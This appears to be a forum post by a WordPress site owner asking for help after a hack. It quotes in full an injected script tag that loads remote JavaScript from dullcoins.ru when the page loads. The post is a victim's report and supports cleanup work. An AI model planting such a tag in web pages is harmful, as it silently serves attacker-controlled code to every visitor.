Blog hacked (dullcoins.ru script)

My blog was hacked about a week ago. When I tried to access both the blog itself and my WP admin, I only got a blank page that listed pluggable.php, default-widgets.php, default-embeds.php, and default-filters.php as having an “unexpected ‘<‘” somewhere. After some quick research online, I re-uploaded clean versions of all the WP core files incl. those listed above and changed all passwords I could think of (FTP, WP, MySQL).

The blog and WP admin showed up again, and now <i>appear to be</i> working as they did before all this.

However, the problem is still there. As the site is loading, a foreign website will load very briefly as well. Viewing my code with Firebug, this is what shows up at the very bottom of the page (before the last closing ‘</body>’ tag):

<script src="https://dullcoins.ru:8080/google.com/y8.com/ip138.com.php" defer="defer"></script>

I’ve gone through all my WP files to find this somewhere and delete it but I haven’t found it. How can that be? And what else could I try to do, other than WP’s basic instructions which I have already tried?